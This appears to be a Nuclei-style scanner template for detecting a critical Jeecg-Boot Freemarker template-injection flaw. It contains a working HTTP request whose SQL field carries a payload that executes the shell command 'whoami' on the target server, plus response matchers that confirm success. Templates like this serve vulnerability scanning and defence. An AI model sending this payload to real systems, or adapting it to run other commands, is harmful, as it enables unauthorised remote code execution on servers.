http:
    - matchers:
        - condition: and
          dsl:
            - status_code_1 == 200 && contains(body_1,"解析成功") && contains(body_1,"fieldList") && contains(body_1,"fieldText")
          type: dsl
      raw:
        - |
          POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
          Host: {{Hostname}}
          Content-Type: application/json

          {"sql":"select '<#assign value=\"freemarker.template.utility.Execute\"?new()>${value(\"whoami\")}'"}
id: jeecg-boot-ssti-rce
info:
    author: SleepingBag945
    description: |
        Jeecg-Boot Freemarker 模版注入漏洞
    metadata: null
    name: Jeecg-Boot SSTI 远程命令执行
    severity: critical
    tags:
        - JEECG
        - Jeecg-Boot
